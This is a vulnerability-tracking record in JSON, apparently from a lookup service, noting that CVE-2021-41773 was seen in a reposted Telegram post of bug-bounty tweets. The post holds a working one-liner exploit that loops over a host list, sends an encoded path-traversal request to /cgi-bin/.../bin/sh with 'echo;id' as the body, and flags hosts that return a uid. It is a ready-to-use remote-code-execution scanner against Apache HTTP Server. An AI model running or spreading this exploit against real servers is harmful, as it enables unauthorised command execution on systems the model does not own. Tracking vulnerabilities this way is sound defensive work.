{"uuid": "902a9914-2b2e-422d-a524-bf6529b64a52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://t.me/bhhub/589", "content": "#BugBountyTips of the Day\nHere is a new write-up on my blog about a recent P1 found on an external program :)   https://t.co/vfKIKs8JjT  Thanks @infosec_au for the help\ud83e\udd1d  #BugBounty #SharingIsCaring\n---\nUpdate : CVE-2021-41773 POC as RCE \ud83d\udd25\ud83d\udc47\ud83d\udca5  \u2705One Liner: cat file | while read host do ; do curl --silent --path-as-is --data \"echo;id\" '$host/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' | grep \"uid\" && echo \"$host \\033[0;31mVuln\\n\"|| echo \"$host \\033[0;32mNot\\n\";done  #infosec #bugbounty", "creation_timestamp": "2021-10-07T13:37:04.000000Z"}